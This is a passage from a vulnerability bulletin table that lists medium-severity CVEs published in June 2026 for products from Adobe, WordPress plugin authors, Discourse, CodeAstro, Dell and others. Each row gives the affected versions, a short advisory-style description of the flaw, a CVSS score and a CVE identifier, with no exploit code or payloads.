| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48300 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48301 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48304 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by an Improper Redirect (Open Redirect) vulnerability that could lead to account takeover. An attacker could construct a malicious URL that redirects a victim to an attacker-controlled site. Exploitation of this issue requires user interaction in that a victim must click on a malicious link. | 2026-06-09 | 4.3 | CVE-2026-47991 |
| Adobe--Adobe Experience Manager Forms JEE | Adobe Experience Manager Forms JEE versions LTS SP1, 6.5.24.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.9 | CVE-2026-34694 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47902 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Input Validation vulnerability. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47903 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47904 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Uncontrolled Resource Consumption vulnerability. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction. | 2026-06-09 | 6.2 | CVE-2026-47905 |
| Adobe--CAI Content Credentials | CAI Content Credentials versions c2pa-web@0.7.1, c2pa-v0.80.1 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in an arbitrary file system write. An attacker could leverage this vulnerability to write to unauthorized files or directories outside of intended restrictions. Exploitation of this issue requires user interaction in that a victim must extract a maliciously crafted file. | 2026-06-09 | 5.5 | CVE-2026-34657 |
| Adobe--ColdFusion | ColdFusion versions 2023.19, 2025.8 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 4.8 | CVE-2026-47933 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 6.3 | CVE-2026-47909 |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.7 and earlier are affected by an Incorrect Authorization vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed. | 2026-06-09 | 6.3 | CVE-2026-47910 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34703 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34704 |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.3, 20.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-34705 |
| AMD--AMD EPYC 7003 Series Processors | Improper input validation for DIMM serial presence detect (SPD) metadata could allow an attacker with physical access, ring0 access on a system with a non-compliant DIMM, or control over the Root of Trust for BIOS update, to potentially overwrite guest memory resulting in loss of guest data integrity. | 2026-06-10 | 5.3 | CVE-2024-21944 |
| andrewabarber--Extra Settings for RocketChat | The Extra Settings for RocketChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rocketchat' shortcode's 'title' attribute in versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping in the rxstg_shortcode() function, which concatenates the user-supplied 'title' attribute directly into HTML output. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8841 |
| apostrophecms--@apostrophecms/cli | ApostropheCMS is an open-source Node.js content management system. Versions of the @apostrophecms/cli package up to and including 3.6.0 contain a command injection vulnerability in the apos create command. User-supplied input from the password prompt is embedded directly into a shell command without proper sanitization or escaping. This allows execution of arbitrary commands on the host system. As of time of publication, no known patched versions are available. | 2026-06-12 | 6.5 | CVE-2026-42853 |
| apostrophecms--sanitize-html | ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Versions of sanitize-html prior to 2.17.5 use `allowedSchemesAppliedToAttributes` (default: `['href', 'src', 'cite']`) to gate the `naughtyHref()` function that blocks dangerous URI schemes like `javascript:` and `vbscript:`. The HTML specification defines 10+ attributes that accept URIs (`action`, `formaction`, `data`, `poster`, `background`, `ping`, `xlink:href`, `dynsrc`, `lowsrc`), but none of these are included in the default gate list. When a developer allows any of these attributes in their configuration, `javascript:` URIs pass through completely unmodified, enabling XSS. Version 2.17.5 patches the issue. | 2026-06-12 | 5.4 | CVE-2026-53606 |
| Aqara--Aqara IAM/SSO Gateway | The Aqara IAM/SSO Gateway (gw-builder.aqara.com) provides an open redirect, which is an instance of "CWE-601: URL Redirection to Untrusted Site," with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 Medium), which can be used to set up a phishing attack. | 2026-06-12 | 6.1 | CVE-2026-50089 |
| Aqara--Cloud Developer Portal | The Aqara Cloud Developer Portal (developer.aqara.com) issued a developer token to any email address supplied by the attacker. This is an instance of "CWE-306: Missing Authentication for Critical Function" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N (6.5 Medium). When combined with CVE-2026-50083, CVE-2026-50084, and CVE-2026-50085, any otherwise-unauthenticated attacker could execute a full takeover of affected devices. | 2026-06-12 | 6.5 | CVE-2026-50082 |
| aurelienlws--LWS Optimize All-in-One Speed Booster & Cache Tools | The LWS Optimize - All-in-One Speed Booster & Cache Tools plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 3.3.19. This is due to the combine_current_css() function trusting <link rel="stylesheet" href="..."> values harvested from page HTML and converting same-site URLs to absolute filesystem paths before reading them with file_get_contents()/Minify\CSS::add(), without enforcing that the resolved path stay within ABSPATH or have a .css extension. This makes it possible for authenticated attackers, with Editor-level access and above, to read arbitrary files. | 2026-06-13 | 4.9 | CVE-2026-12089 |
| AWS--s2n-quic | Unbounded memory allocation in the CRYPTO frame reassembler in s2n-quic before 1.8.2 may allow an unauthenticated remote actor to cause a denial of service (degraded availability) by sending crafted QUIC Initial packets. To remediate this issue, users should upgrade to v1.8.2. | 2026-06-10 | 5.3 | CVE-2026-10740 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, axios exposes two read-side prototype-pollution gadgets. When Object.prototype is polluted by an upstream dependency in the same process (e.g. lodash _.merge / CVE-2018-16487), axios silently picks up the polluted values. (1) lib/utils.js line 406 builds merge()'s accumulator as result = {}, so result[targetKey] (line 414) walks Object.prototype and the polluted bucket's own keys are copied into the merged headers and ride out on the wire. (2) lib/core/mergeConfig.js line 26 builds the hasOwnProperty descriptor as a plain-object literal. Object.defineProperty reads descriptor.get/descriptor.set via the prototype chain, so a polluted Object.prototype.get or Object.prototype.set makes the call throw TypeError synchronously on every axios request. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | 4.8 | CVE-2026-44490 |
| BeRocket--Advanced AJAX Product Filters | Missing Authorization vulnerability in BeRocket Advanced AJAX Product Filters allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Advanced AJAX Product Filters: from n/a through 1.6.3.3. | 2026-06-11 | 5.4 | CVE-2022-45813 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. In versions 0.8.2 and prior, Boxlite allows users to configure a timeout for services running inside the virtual machine. When the timeout is triggered, Boxlite sends a signal to kill the process. However, instead of using the uncatchable SIGKILL signal, Boxlite uses the catchable SIGALRM signal. Malicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the Boxlite service. This issue has been patched via commit 28159fc. | 2026-06-10 | 6.5 | CVE-2026-47213 |
| bplugins--Easy Twitter Feeds | Easy Twitter Feeds before 1.2.13 contains a cross-site request forgery vulnerability in the duplicate_post action handler that lacks nonce verification. Attackers can trick an authenticated user into visiting a crafted link that duplicates any post regardless of post type. | 2026-06-10 | 4.3 | CVE-2026-53736 |
| brechtvds--Easy Image Collage | The Easy Image Collage plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'grid[properties][borderColor]' and 'grid[images][N][attachment_url]' Parameters in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Because the data is stored via update_post_meta() rather than wp_insert_post() post content, WordPress's unfiltered_html restriction does not apply, meaning Authors cannot be blocked from this attack path by capability controls alone. | 2026-06-10 | 6.4 | CVE-2026-9019 |
| brian-ruf--OSCAL-GUI | OSCAL-GUI contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious input through the project request parameter. Attackers can craft a malicious URL containing unsanitized input that breaks out of the JavaScript string and HTML attribute context in the body onload event handler to execute arbitrary scripts when the link is visited by a victim. | 2026-06-09 | 6.1 | CVE-2026-34416 |
| brian-ruf--OSCAL-GUI | OSCAL-GUI contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious content through the project request parameter in oscal-forms.php. The parameter value is URL-decoded and assigned to the project_id variable without sanitization in oscal-functions.php, and when the supplied project ID is not found, the unsanitized value is concatenated into an error message via the Messages() function and reflected into the HTML response body without encoding. | 2026-06-09 | 6.1 | CVE-2026-34417 |
| brooks24--admin-word-count-column | WordPress Plugin admin-word-count-column 2.2 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting null byte injection in the path parameter. Attackers can send GET requests to download-csv.php with a crafted path parameter containing directory traversal sequences and null bytes to bypass file restrictions and read sensitive files like system configuration. | 2026-06-08 | 6.2 | CVE-2022-50953 |
| brthumar1959--Product Filter Widget for Elementor | The Product Filter Widget for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'args[filterFormArray]' Parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The endpoint is registered via wp_ajax_nopriv_ with no nonce verification or capability check, and exploitation is delivered via a CSRF-style form auto-submission to the admin-ajax.php endpoint, requiring the attacker to trick a victim into visiting an attacker-controlled page. | 2026-06-09 | 6.1 | CVE-2026-11603 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains an insecure direct object reference vulnerability in the friends REST API that allows any authenticated attacker to enumerate another user's complete friend list. Attackers can query the friends endpoint with an arbitrary user_id because the get_items_permissions_check method only verifies that the requester is logged in and never checks ownership of the requested list, resulting in disclosure of users' private social connections. | 2026-06-09 | 4.3 | CVE-2026-53675 |
| Cap-go--capgo | Cap-go Console < 12.28.2 contains a denial-of-service vulnerability in its account deletion flow that allows an attacker to block authentication and onboarding functions by triggering account deletion while a device identifier is linked to the active session. The platform incorrectly associates the deletion state with the device identifier, causing the affected device or browser environment to be redirected to an account-disabled page for approximately 30 days, preventing any account login or registration from that device. | 2026-06-12 | 6.5 | CVE-2026-53982 |
| Cap-go--capgo | Capgo before 12.128.2 fails to delete previously uploaded profile images from backend storage when users replace or remove them. Attackers can access orphaned image files through previously generated URLs, allowing unauthorized retrieval of user-uploaded content. | 2026-06-12 | 4.3 | CVE-2026-53867 |
| Chengdu Everbrite Network Technology--BeikeShop | A vulnerability was found in Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22. Impacted is an unknown function of the file beike/Admin/Routes/admin.php of the component Admin Design Builder Endpoint. Performing a manipulation of the argument settings.value results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 2fa9805411088069fcc3b0c15b2f1f33d6e09958. To fix this issue, it is recommended to deploy a patch. | 2026-06-08 | 6.3 | CVE-2026-11480 |
| code16--sharp | Sharp is a content management framework built for Laravel as a package. From version 9.0.0 to before version 9.22.3, the create and store endpoints of the Quick Creation Command feature did not enforce any authorization check. An authenticated Sharp user without create permission on a given entity could bypass the authorization layer and either retrieve the creation form or submit new records for that entity, as long as it had a Quick Creation Command handler configured. This issue has been patched in version 9.22.3. | 2026-06-10 | 4.3 | CVE-2026-53634 |
| CodeAstro--Human Resource Management System | A weakness has been identified in CodeAstro Human Resource Management System 1.0. This vulnerability affects the function Invoice of the file \application\controllers\Payroll.php of the component Payroll Invoice Module. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-06-12 | 6.3 | CVE-2026-12131 |
| CodeAstro--Ingredients Stock Management System | A vulnerability was detected in CodeAstro Ingredients Stock Management System 1.0. This impacts an unknown function of the file /Ingredients-Stock/add_stock.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11495 |
| CodeAstro--Leave Management System | A vulnerability has been found in CodeAstro Leave Management System 1.0. This impacts an unknown function of the file /admin/search_staff_for_deletion.php. The manipulation of the argument Name leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11506 |
| CodeAstro--Leave Management System | A vulnerability was found in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /admin/delete_leave_type.php. The manipulation of the argument leave_type results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-06-08 | 6.3 | CVE-2026-11507 |
| CodeAstro--Leave Management System | A vulnerability was determined in CodeAstro Leave Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search_staff_to_assign_pc.php. This manipulation of the argument Name causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 6.3 | CVE-2026-11508 |
| CodeAstro--Leave Management System | A vulnerability was identified in CodeAstro Leave Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/search_staff_for_updation.php. Such manipulation of the argument Name leads to sql injection. The attack may be performed from remote. | 2026-06-08 | 6.3 | CVE-2026-11509 |
| CodeAstro--Leave Management System | A security flaw has been discovered in CodeAstro Leave Management System 1.0. This affects an unknown part of the file /admin/add_leave.php. Performing a manipulation of the argument type_of_leave results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 6.3 | CVE-2026-11510 |
| CodeAstro--Payroll System | A security vulnerability has been detected in CodeAstro Payroll System 1.0. The impacted element is an unknown function of the file /home_salary.php. The manipulation of the argument rate/salary_rate leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 6.3 | CVE-2026-11558 |
| CodeAstro--Payroll System | A vulnerability was detected in CodeAstro Payroll System 1.0. This affects an unknown function of the file /view_account.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11559 |
| CodeAstro--Student Attendance Management System | A vulnerability has been found in CodeAstro Student Attendance Management System 1.0. This affects an unknown function of the file /attendance-php/Admin/createClass.php. The manipulation of the argument className leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11583 |
| CodeAstro--Student Attendance Management System | A vulnerability was found in CodeAstro Student Attendance Management System 1.0. This impacts an unknown function of the file /attendance-php/Admin/createClass.php?action=edit. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-06-08 | 6.3 | CVE-2026-11584 |
| CodeAstro--Student Attendance Management System | A vulnerability was determined in CodeAstro Student Attendance Management System 1.0. Affected is an unknown function of the file /attendance-php/Admin/createClassArms.php. This manipulation of the argument classId causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 6.3 | CVE-2026-11585 |
| CodeAstro--Student Attendance Management System | A vulnerability was detected in CodeAstro Student Attendance Management System 1.0. Impacted is an unknown function of the file /attendance-php/Admin/createStudents.php. Performing a manipulation of the argument admissionNumber results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-06-13 | 4.7 | CVE-2026-12175 |
| codesupplyco--Canvas | The Canvas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' parameter in all versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-9629 |
| ConnectWise--ScreenConnect | In ScreenConnectâ„¢ versions prior to 26.2, input validation within the Host Pass creation functionality could allow an authenticated user with Host Pass creation privileges the ability to specify a token expiration duration beyond the intended maximum when generating delegated access tokens. | 2026-06-10 | 4.7 | CVE-2026-11596 |
| D-Link--DCS-5615 | A vulnerability has been found in D-Link DCS-5615 1.01.00. Affected by this vulnerability is an unknown functionality of the file /etc/conf.d/boa/boa.conf of the component Boa Webserver. Such manipulation leads to least privilege violation. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 5.3 | CVE-2026-11497 |
| D-Link--DIR-823G | A security flaw has been discovered in D-Link DIR-823G 1.0.2B05. The affected element is an unknown function of the file /etc/vsftpd.conf of the component vsftpd. Performing a manipulation results in least privilege violation. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 4.3 | CVE-2026-11492 |
| DALIBO--PostgreSQL Anonymizer | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a JSON document and placing malicious code inside a particular key-value pair. If a superuser calls the import_database_rules() or import_roles_rules() functions, the malicious code is executed with superuser privileges. The problem is resolved in PostgreSQL Anonymizer 3.1.1 and further versions | 2026-06-11 | 6.4 | CVE-2026-11945 |
| Dcat-Admin--Dcat-Admin | A weakness has been identified in Dcat-Admin up to 2.2.3-beta. This impacts the function editorMDUpload of the file /admin/dcat-api/editor-md/upload of the component User Setting Page. This manipulation of the argument editormd-image-file causes unrestricted upload. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-09 | 4.7 | CVE-2026-11621 |
| Dell--Dell Edge Gateway 3000 | Dell Client Platform BIOS contains a Weak Encoding for Password vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-06-09 | 5.7 | CVE-2026-40639 |
| Dell--Dell/Alienware Purchased Apps | Dell/Alienware Purchased Apps, versions prior to 1.1.32.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write | 2026-06-09 | 6.3 | CVE-2026-44275 |
| Dell--iDRAC Tools | Dell iDRAC Tools, versions prior to 11.4.1.0, contains an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering. | 2026-06-09 | 6 | CVE-2026-28262 |
| Dell--Inventory Collector Client | Dell Inventory Collector Client, versions prior to 13.8.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write. | 2026-06-09 | 6.3 | CVE-2026-41116 |
| designcomputer--mysql-mcp-server | A vulnerability was determined in designcomputer mysql-mcp-server up to 0.2.2. The impacted element is the function read_resource of the file src/mysql_mcp_server/server.py of the component mysql URI Handler. This manipulation of the argument uri_str causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 0.3.0 is sufficient to resolve this issue. Patch name: 080bef9a96d625ce0dfbde573a08b93497871981. Upgrading the affected component is advised. | 2026-06-08 | 6.3 | CVE-2026-11529 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, group owners who are not necessarily admins or moderators can view a group's outgoing email/SMTP credentials in plaintext via the group history log (/groups/:name/logs.json). Affected fields: email_password, email_username, smtp_server, smtp_port, smtp_ssl_mode. The most sensitive item is the SMTP password, which an owner could use to send mail as the group from outside Discourse. This impacts sites that have configured per-group SMTP credentials and granted group ownership to users who should not have access to those credentials. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 6.5 | CVE-2026-44784 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, a path traversal vulnerability in Discourse backup handling could allow an authenticated administrator on one site in a multisite deployment to access backup files belonging to another site when backups are stored locally. In affected configurations, an admin on Site A could potentially retrieve sensitive backup data from Site B (same host, multisite) by crafting a backup download request with a traversal payload. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 6.8 | CVE-2026-45775 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, a flaw in how replies to whisper posts are handled allows authenticated users outside the groups configured in whispers_allowed_groups to post into a topic's staff-only whisper channel. The injected content is visible to whisperers (typically staff) alongside legitimate whispers. Only sites that have whispers enabled are affected. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.4 | CVE-2026-44783 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, four authorization/disclosure issues in the chat plugin (one also involving discourse-calendar): read-only category users could create chat threads, self-deleted chat messages could be restored by their author after channel access was revoked, moderators reviewing a flagged chat message were shown the channel's current last_message (often unrelated DM content), and calendar event payloads exposed the attached chat channel and its last message to viewers without chat access (including anonymous users). This affects sites with the chat plugin enabled; the calendar issue additionally requires discourse-calendar. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.3 | CVE-2026-45085 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, DetailedTagSerializer#tag_group_names returned every tag group a tag belonged to without filtering against the requesting user's visibility. With SiteSetting.tags_listed_by_group enabled, anonymous and unprivileged users hitting TagsController#info (which is exempt from requires_login) could read the names of tag groups restricted to specific user groups or non-visible categories. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 5.3 | CVE-2026-47264 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, bot debug endpoints disclose whisper translation audit logs. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44779 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, ReviewableQueuedPostSerializer unconditionally included payload["raw_email"] for posts that arrived via incoming email. Category moderation group members reaching the review queue could therefore read the full inbound email source (headers, sender trace, MUA, body) without being in view_raw_email_allowed_groups - the trust boundary that gates the dedicated raw-email endpoint. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44780 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, GroupPostSerializer declared include_user_long_name? as the predicate for its :name attribute, but AMS looks for include_name?. The misnamed predicate was never called, so object.user.name was always serialized regardless of SiteSetting.enable_names. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44782 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, the AI "explain" helper only checks can_see? on the post being explained, not its reply_to_post, so any authenticated user with access to the AI helper could read the raw contents of a hidden parent post by invoking "Explain" on a reply to it. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-44785 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, the MessageBus.publish call for /web_hook_events/<id> in Jobs::RedeliverWebHookEvents did not pass group_ids, leaving the channel readable by any authenticated user (or anonymous user on instances where login_required is disabled). Webhook IDs are sequential integers and trivially enumerable. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 4.3 | CVE-2026-47263 |
| Dolibarr--ERP CRM | A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. The impacted element is an unknown function of the file htdocs/core/filemanagerdol/connectors/php/config.inc.php of the component Legacy Filemanager. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. Upgrading to version 23.0.3 is sufficient to resolve this issue. The identifier of the patch is f1b2dd6481e22cacb561d29ffdcd3a50b618479d. Upgrading the affected component is advised. | 2026-06-09 | 6.3 | CVE-2026-11619 |
| Ellucian--Banner Self-Service | Ellucian Banner Self-Service before the April T2 release (2025-04-23) contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting unsanitized input through the toDateFormat request parameter in the dateConverter endpoint. Attackers can craft a malicious URL targeting the unauthenticated dateConverter endpoint to steal session cookies or perform other malicious actions in the context of the victim's browser session. | 2026-06-09 | 6.1 | CVE-2026-32856 |
| Ellucian--Banner Self-Service | Ellucian Banner Self-Service before the April T2 release (2025-04-23) contains a stored cross-site scripting vulnerability in the course search functionality that allows authenticated Banner ERP users to inject malicious payloads into faculty and course fields by exploiting missing HTML encoding during DOM insertion. An attacker with Banner ERP write access can store malicious JavaScript in fields such as faculty displayName, emailAddress, subjectDescription, or courseTitle; these values are subsequently served unsanitized by the unauthenticated getFacultyMeetingTimes API endpoint, causing arbitrary script execution in the browser of any user who views the affected course's meeting times. | 2026-06-09 | 5.4 | CVE-2026-47106 |
